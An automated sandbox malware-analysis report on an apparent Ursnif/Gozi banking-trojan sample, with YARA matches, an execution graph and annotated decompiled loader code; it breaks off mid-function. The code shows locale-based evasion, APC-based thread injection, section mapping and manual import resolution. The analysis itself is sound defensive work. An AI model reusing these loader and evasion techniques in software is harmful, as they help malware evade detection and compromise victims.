Start time: 14:59:10
Start date: 14/03/2023
Path: C:\Users\user\Desktop\KOYCdGz80D.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\KOYCdGz80D.exe
Imagebase: 0x400000
File size: 240128 bytes
MD5 hash: D09F787A952A6E946656AC9184768FBE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.418089907.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.418089907.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.418089907.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.417900586.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.417900586.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.417900586.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.418062084.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.418062084.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.418062084.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.509300056.0000000000820000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.508996515.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.509844164.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.509844164.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.509844164.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.417978343.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.417978343.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.417978343.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.417934305.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.417934305.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.417934305.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.418044877.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.418044877.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.418044877.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.418004616.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.418004616.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.418004616.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.418106797.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.418106797.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.418106797.0000000002BE8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation: low


                              Execution Graph

Execution Coverage: 6.3%
Dynamic/Decrypted Code Coverage: 96.9%
Signature Coverage: 46.1%
Total number of Nodes: 128
Total number of Limit Nodes: 16
execution_graph (graph node/edge data, summarised by function; internal node IDs dropped, API names kept at the address they resolved to):
- Entry: 401de1 HeapCreate -> 401dfa GetModuleHandleA, GetCommandLineW -> 4019f1 (401e1f ExitProcess if HeapCreate fails); 401ba4 HeapDestroy on the way out
- 4019f1: 401d68 CreateEventA -> 401d86 GetVersion -> 401d9d GetCurrentProcessId, OpenProcess (401dda GetLastError); loop of 401a1e NtQuerySystemInformation with 4012e6 HeapAlloc / 401ba9 HeapFree; 401688 (HeapAlloc, 4017ed Sleep); 401a85 GetLocaleInfoA -> 401a9f GetSystemDefaultUILanguage, VerLanguageNameA; 401800 (HeapAlloc, 401824 GetModuleFileNameW, 401867 GetLastError, HeapFree); 401ad3 and 401afa GetLongPathNameW; 401b05 CreateThread -> 401b33 QueueUserAPC (on failure 401b4d GetLastError, TerminateThread, CloseHandle, SetLastError) -> 401b6d WaitForSingleObject -> 401b7d GetExitCodeThread -> 401b88 CloseHandle; 401b8d / 401b9e GetLastError
- 40139f (the routine queued as APC): 401d3c ConvertStringSecurityDescriptorToSecurityDescriptorA -> 401882 (HeapAlloc, HeapFree) -> 4013f5 lstrlenW -> 4015b0 GetSystemTimeAsFileTime, 4015d8 CreateFileMappingW, 401642 MapViewOfFile (401634 / 401660 / 401671 GetLastError, 401668 CloseHandle) -> 4012fb -> 401202 (HeapAlloc, 40121a GetModuleHandleA, GetProcAddress, then 401251 / 401267 / 40127d / 401293 GetProcAddress, 40110b NtCreateSection -> 401459 NtMapViewOfSection -> 401183 memset) -> 401000 (401034 LoadLibraryA, 4010a6 GetProcAddress) -> 4014cf and 40156e VirtualProtect (401583 GetLastError) -> 40144c ExitThread; 401379 GetLastError and HeapFree on the error paths
- 410a56 -> 410a90 RtlAllocateHeap
- 824f05 -> 8256a5: 8256c9 CreateToolhelp32Snapshot -> 8256e5 Module32First -> 825364: 8253a0 VirtualAlloc (these addresses lie outside the loaded image at 0x400000)

                              Control-flow Graph

                              C-Code - Quality: 85%
                              			E004019F1() {
                              				long _v8;
                              				char _v12;
                              				char _v16;
                              				void* _v40;
                              				long _t28;
                              				long _t31;
                              				signed short _t33;
                              				void* _t37;
                              				long _t40;
                              				long _t41;
                              				void* _t48;
                              				intOrPtr _t50;
                              				signed int _t57;
                              				signed int _t58;
                              				long _t63;
                              				long _t65;
                              				intOrPtr _t66;
                              				void* _t71;
                              				void* _t75;
                              				signed int _t77;
                              				signed int _t78;
                              				void* _t82;
                              				intOrPtr* _t83;
                              
                              				_t28 = E00401D68();
                              				_v8 = _t28;
                              				if(_t28 != 0) {
                              					return _t28;
                              				}
				do {
					_t77 = 0;
					_v12 = 0;
					_t63 = 0x30; // sizeof(SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION), one record per processor
					do {
						_t71 = E004012E6(_t63); // HeapAlloc wrapper
						if(_t71 == 0) {
							_v8 = 8; // ERROR_NOT_ENOUGH_MEMORY
						} else {
							// class 8 = SystemProcessorPerformanceInformation
							_t57 = NtQuerySystemInformation(8, _t71, _t63,  &_v12); // executed
							_t67 = _t57;
							_t58 = _t57 & 0x0000ffff;
							_v8 = _t58;
							if(_t58 == 4) { // low word of STATUS_INFO_LENGTH_MISMATCH (0xC0000004): grow the buffer by one record and retry
								_t63 = _t63 + 0x30;
							}
							_t78 = 0x13;
							_t10 = _t67 + 1; // 0x1
							// low dword of the first record's IdleTime, mod 19, plus 1: a timing-derived delay factor
							_t77 =  *_t71 % _t78 + _t10;
							E00401BA9(_t71); // HeapFree wrapper
						}
					} while (_v8 != 0);
					_v8 = E00401688(_t77);
					Sleep(_t77 << 4); // executed; 16 * _t77 ms, i.e. 16..304 ms when the query succeeded
					_t31 = _v8;
				} while (_t31 == 0x15); // 0x15 = ERROR_NOT_READY: repeat the whole sequence
                              				if(_t31 != 0) {
                              					L30:
                              					return _t31;
                              				}
				_v12 = 0;
				// LOCALE_USER_DEFAULT (0x400), LOCALE_SISO3166CTRYNAME (0x5a): two-letter ISO country code of the user locale
				_t33 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 4); // executed
				if(_t33 == 0) {
					// fallback when the locale query fails: derive a name from the system UI language
					__imp__GetSystemDefaultUILanguage();
					_t67 =  &_v12;
					VerLanguageNameA(_t33 & 0xffff,  &_v12, 4);
				}
				if(_v12 == 0x5552) { // 0x5552 is "RU" as little-endian bytes 'R','U': on a Russian locale skip the payload path and return
                              					L28:
                              					_t31 = _v8;
                              					if(_t31 == 0xffffffff) {
                              						_t31 = GetLastError();
                              					}
                              					goto L30;
                              				} else {
					if(E00401800(_t67,  &_v16) != 0) {
						 *0x404178 = 0;
						L20:
						// The thread's start routine is kernel32!SleepEx itself (sleep length from the global at 0x404180),
						// so no code address of the sample appears as a thread entry point ...
						_t37 = CreateThread(0, 0, __imp__SleepEx,  *0x404180, 0, 0); // executed
						_t82 = _t37;
						if(_t82 == 0) {
							L27:
							_v8 = GetLastError();
							goto L28;
						}
						// ... and the actual worker E0040139F is delivered into that thread as a user-mode APC
						_t40 = QueueUserAPC(E0040139F, _t82,  &_v40); // executed
                              						if(_t40 == 0) {
                              							_t65 = GetLastError();
                              							TerminateThread(_t82, _t65);
                              							CloseHandle(_t82);
                              							_t82 = 0;
                              							SetLastError(_t65);
                              						}
                              						if(_t82 == 0) {
                              							goto L27;
                              						} else {
                              							_t41 = WaitForSingleObject(_t82, 0xffffffff);
                              							_v8 = _t41;
                              							if(_t41 == 0) {
                              								GetExitCodeThread(_t82,  &_v8);
                              							}
                              							CloseHandle(_t82);
                              							goto L28;
                              						}
                              					}
                              					_t66 = _v16;
                              					_t83 = __imp__GetLongPathNameW;
                              					_t48 =  *_t83(_t66, 0, 0); // executed
                              					_t75 = _t48;
                              					if(_t75 == 0) {
                              						L18:
                              						 *0x404178 = _t66;
                              						goto L20;
                              					}
                              					_t22 = _t75 + 2; // 0x2
                              					_t50 = E004012E6(_t75 + _t22);
                              					 *0x404178 = _t50;
                              					if(_t50 == 0) {
                              						goto L18;
                              					}
                              					 *_t83(_t66, _t50, _t75); // executed
                              					E00401BA9(_t66);
                              					goto L20;
                              				}
                              			}

                              APIs
                                • Part of subcall function 00401D68: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
                                • Part of subcall function 00401D68: GetVersion.KERNEL32 ref: 00401D86
                                • Part of subcall function 00401D68: GetCurrentProcessId.KERNEL32 ref: 00401DA2
                                • Part of subcall function 00401D68: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
                                • Part of subcall function 004012E6: HeapAlloc.KERNEL32(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
                              • NtQuerySystemInformation.NTDLL ref: 00401A26
                              • Sleep.KERNEL32(00000000,00000000,00000030,?,00000000), ref: 00401A6D
                              • GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
                              • GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
                              • VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
                              • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00401ADF
                              • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00401AFD
                              • CreateThread.KERNEL32 ref: 00401B27
                              • QueueUserAPC.KERNEL32(0040139F,00000000,?,?,00000000), ref: 00401B3D
                              • GetLastError.KERNEL32(?,00000000), ref: 00401B4D
                              • TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B57
                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B5E
                              • SetLastError.KERNEL32(00000000,?,00000000), ref: 00401B63
                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00401B70
                              • GetExitCodeThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B82
                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B89
                              • GetLastError.KERNEL32(?,00000000), ref: 00401B8D
                              • GetLastError.KERNEL32(?,00000000), ref: 00401B9E
                              Memory Dump Source
                              • Source File: 00000000.00000002.508788787.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.508788787.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.508788787.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.508788787.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: ErrorLast$NameThread$CloseCreateHandleLanguageLongPathProcessSystem$AllocCodeCurrentDefaultEventExitHeapInfoInformationLocaleObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
                              • String ID:
                              • API String ID: 520738550-0
                              • Opcode ID: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
                              • Instruction ID: e4abbca9115d716754b6864e37b0832fe911a2439c52af45cdd796d0275508de
                              • Opcode Fuzzy Hash: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
                              • Instruction Fuzzy Hash: 4E519E71901214ABE721AFA59D48EAFBA7CAB45755F104177F901F32A0EB389A40CB68
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 69%
                              			E004015B0(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                              				intOrPtr _v12;
                              				struct _FILETIME* _v16;
                              				short _v60;
                              				struct _FILETIME* _t14;
                              				intOrPtr _t15;
                              				long _t18;
                              				void* _t19;
                              				void* _t22;
                              				intOrPtr _t31;
                              				long _t32;
                              				void* _t34;
                              
                              				_t31 = __edx;
                              				_t14 =  &_v16;
                              				GetSystemTimeAsFileTime(_t14);
                              				_push(0x192);
                              				_push(0x54d38000);
                              				_push(_v12);
                              				_push(_v16);
                              				L00402026();
                              				_push(_t14);
                              				_v16 = _t14;
                              				_t15 =  *0x404184;
                              				_push(_t15 + 0x4051ca);
                              				_push(_t15 + 0x4051c0);
                              				_push(0x16);
                              				_push( &_v60);
                              				_v12 = _t31;
                              				L00402020();
                              				_t18 = _a4;
                              				if(_t18 == 0) {
                              					_t18 = 0x1000;
                              				}
                              				_t19 = CreateFileMappingW(0xffffffff, 0x404188, 4, 0, _t18,  &_v60); // executed
                              				_t34 = _t19;
                              				if(_t34 == 0) {
                              					_t32 = GetLastError();
                              				} else {
                              					if(_a4 != 0 || GetLastError() == 0xb7) {
                              						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                              						if(_t22 == 0) {
                              							_t32 = GetLastError();
                              							if(_t32 != 0) {
                              								goto L9;
                              							}
                              						} else {
                              							 *_a8 = _t34;
                              							 *_a12 = _t22;
                              							_t32 = 0;
                              						}
                              					} else {
                              						_t32 = 2;
                              						L9:
                              						CloseHandle(_t34);
                              					}
                              				}
                              				return _t32;
                              			}

                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,00401418,0000000A,?,?), ref: 004015BD
                              • CreateFileMappingW.KERNELBASE(000000FF,00404188,00000004,00000000,?,?), ref: 0040161D
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401634
                              • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 00401648
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401660
                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A), ref: 00401669
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401418,0000000A,?), ref: 00401671
                              Memory Dump Source
                              • Source File: 00000000.00000002.508788787.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.508788787.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.508788787.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.508788787.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView
                              • String ID:
                              • API String ID: 3812556954-0
                              • Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
                              • Instruction ID: e8584db34bd0864965919452e9e7a980232bfbaa31af8ac4f809374209f4ae08
                              • Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
                              • Instruction Fuzzy Hash: 1421C8B2500208BFD7119FA4DC84EAF3BACEB44355F14443AFA05F72E0D6758D458B68
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              [control-flow graph image omitted; legend: Executed / Not Executed]
                              C-Code - Quality: 72%
                              			E0040110B(intOrPtr* __eax, void** _a4) {
                              				int _v12;
                              				void* _v16;
                              				void* _v20;
                              				void* _v24;
                              				int _v28;
                              				int _v32;
                              				intOrPtr _v36;
                              				int _v40;
                              				int _v44;
                              				void* _v48;
                              				void* __esi;
                              				long _t34;
                              				void* _t39;
                              				void* _t47;
                              				intOrPtr* _t48;
                              
                              				_t48 = __eax;
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				asm("stosd");
                              				_v24 =  *((intOrPtr*)(__eax + 4));
                              				_v16 = 0;
                              				_v12 = 0;
                              				_v48 = 0x18;
                              				_v44 = 0;
                              				_v36 = 0x40;
                              				_v40 = 0;
                              				_v32 = 0;
                              				_v28 = 0;
                              				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                              				if(_t34 < 0) {
                              					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                              				} else {
                              					 *_t48 = _v16;
                              					_t39 = E00401459(_t48,  &_v12); // executed
                              					_t47 = _t39;
                              					if(_t47 != 0) {
                              						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                              					} else {
                              						memset(_v12, 0, _v24);
                              						 *_a4 = _v12;
                              					}
                              				}
                              				return _t47;
                              			}

                              APIs
                              • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,77294EE0,00000000,00000000,?), ref: 00401168
                                • Part of subcall function 00401459: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
                              • memset.NTDLL ref: 0040118A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.508788787.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.508788787.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.508788787.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.508788787.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: Section$CreateViewmemset
                              • String ID: @
                              • API String ID: 2533685722-2766056989
                              • Opcode ID: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
                              • Instruction ID: 902b655066e6f1ef2c1749b59dddf7677aeeae3e3ffa194d207bc0e2506ab0da
                              • Opcode Fuzzy Hash: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
                              • Instruction Fuzzy Hash: 38214DB1D00209AFDB10DFA9C8809EEFBB9FF48314F10453AE616F7250D734AA048B64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              [control-flow graph image omitted; legend: Executed / Not Executed]
                              C-Code - Quality: 100%
                              			E00401000(void* __edi, intOrPtr _a4) {
                              				signed int _v8;
                              				intOrPtr* _v12;
                              				_Unknown_base(*)()** _v16;
                              				signed int _v20;
                              				signed short _v24;
                              				struct HINSTANCE__* _v28;
                              				intOrPtr _t43;
                              				intOrPtr* _t45;
                              				intOrPtr _t46;
                              				struct HINSTANCE__* _t47;
                              				intOrPtr* _t49;
                              				intOrPtr _t50;
                              				signed short _t51;
                              				_Unknown_base(*)()* _t53;
                              				CHAR* _t54;
                              				_Unknown_base(*)()* _t55;
                              				void* _t58;
                              				signed int _t59;
                              				_Unknown_base(*)()* _t60;
                              				intOrPtr _t61;
                              				intOrPtr _t65;
                              				signed int _t68;
                              				void* _t69;
                              				CHAR* _t71;
                              				signed short* _t73;
                              
                              				_t69 = __edi;
                              				_v20 = _v20 & 0x00000000;
                              				_t59 =  *0x404180;
                              				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x18bad598));
                              				if(_t43 != 0) {
                              					_t45 = _t43 + __edi;
                              					_v12 = _t45;
                              					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                              					if(_t46 != 0) {
                              						while(1) {
                              							_t71 = _t46 + _t69;
                              							_t47 = LoadLibraryA(_t71); // executed
                              							_v28 = _t47;
                              							if(_t47 == 0) {
                              								break;
                              							}
                              							_v24 = _v24 & 0x00000000;
                              							 *_t71 = _t59 - 0x43175ac3;
                              							_t49 = _v12;
                              							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                              							_t50 =  *_t49;
                              							if(_t50 != 0) {
                              								L6:
                              								_t73 = _t50 + _t69;
                              								_v16 = _t61 + _t69;
                              								while(1) {
                              									_t51 =  *_t73;
                              									if(_t51 == 0) {
                              										break;
                              									}
                              									if(__eflags < 0) {
                              										__eflags = _t51 - _t69;
                              										if(_t51 < _t69) {
                              											L12:
                              											_t21 =  &_v8;
                              											 *_t21 = _v8 & 0x00000000;
                              											__eflags =  *_t21;
                              											_v24 =  *_t73 & 0x0000ffff;
                              										} else {
                              											_t65 = _a4;
                              											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                              											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                              												goto L12;
                              											} else {
                              												goto L11;
                              											}
                              										}
                              									} else {
                              										_t51 = _t51 + _t69;
                              										L11:
                              										_v8 = _t51;
                              									}
                              									_t53 = _v8;
                              									__eflags = _t53;
                              									if(_t53 == 0) {
                              										_t54 = _v24 & 0x0000ffff;
                              									} else {
                              										_t54 = _t53 + 2;
                              									}
                              									_t55 = GetProcAddress(_v28, _t54);
                              									__eflags = _t55;
                              									if(__eflags == 0) {
                              										_v20 = _t59 - 0x43175a44;
                              									} else {
                              										_t68 = _v8;
                              										__eflags = _t68;
                              										if(_t68 != 0) {
                              											 *_t68 = _t59 - 0x43175ac3;
                              										}
                              										 *_v16 = _t55;
                              										_t58 = _t59 * 4 - 0xc5d6b08;
                              										_t73 = _t73 + _t58;
                              										_t32 =  &_v16;
                              										 *_t32 = _v16 + _t58;
                              										__eflags =  *_t32;
                              										continue;
                              									}
                              									goto L23;
                              								}
                              							} else {
                              								_t50 = _t61;
                              								if(_t61 != 0) {
                              									goto L6;
                              								}
                              							}
                              							L23:
                              							_v12 = _v12 + 0x14;
                              							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                              							if(_t46 != 0) {
                              								continue;
                              							} else {
                              							}
                              							L26:
                              							goto L27;
                              						}
                              						_t60 = _t59 + 0xbce8a5bb;
                              						__eflags = _t60;
                              						_v20 = _t60;
                              						goto L26;
                              					}
                              				}
                              				L27:
                              				return _v20;
                              			}

                              APIs
                              • LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 00401038
                              • GetProcAddress.KERNEL32(?,00000000), ref: 004010AA
                              Memory Dump Source
                              • Source File: 00000000.00000002.508788787.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.508788787.0000000000403000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.508788787.0000000000405000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.508788787.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID:
                              • API String ID: 2574300362-0
                              • Opcode ID: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
                              • Instruction ID: 069ebb05316bb06cd12a0d66d81b5033da0b120a8bf666a49d589dbfec54084e
                              • Opcode Fuzzy Hash: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
                              • Instruction Fuzzy Hash: 65314975E0020ADFDB14CF59C980AAAB7F4BF04301B24407AD981FB7A0E779DA81CB58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008256CD
                              • Module32First.KERNEL32(00000000,00000224), ref: 008256ED
                              Memory Dump Source
                              • Source File: 00000000.00000002.509300056.0000000000820000.00000040.00000020.00020000.00000000.sdmp, Offset: 00820000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_820000_KOYCdGz80D.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateFirstModule32SnapshotToolhelp32
                              • String ID:
                              • API String ID: 3833638111-0
                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                              • Instruction ID: d898f8df674052b4f0fc3ea14dbb2df69223c0f1d46421f1f457991fa8364e49
                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                              • Instruction Fuzzy Hash: 62F0C231540B216BDB202AB9AC8CB6E73ECFF59725F900528E642D10C0CAB0EC854A65
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 68%
                              			E00401459(void** __esi, PVOID* _a4) {
                              				long _v8;
                              				void* _v12;
                              				void* _v16;
                              				long _t13;
                              
                              				_v16 = 0;
                              				asm("stosd");
                              				_v8 = 0;
                              				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                              				if(_t13 < 0) {
                              					_push(_t13);
                              					return __esi[6]();
                              				}
                              				return 0;
                              			}


                              APIs
                              • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
                              Memory Dump Source
                              • Source File: 00000000.00000002.508788787.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.508788787.0000000000403000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.508788787.0000000000405000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.508788787.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_KOYCdGz80D.jbxd
                              Similarity
                              • API ID: SectionView
                              • String ID:
                              • API String ID: 1323581903-0
                              • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                              • Instruction ID: 2ffffb3a0e1fef12aabb3d262299a14fd526f72662b70b4f27343324966f1358
                              • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                              • Instruction Fuzzy Hash: E9F037B590020CFFDB11DFA5CC85CAFBBBDEB44354B10493AF552E50A0D6309E089B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              C-Code - Quality: 100%
                              			E00401202(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                              				intOrPtr _v8;
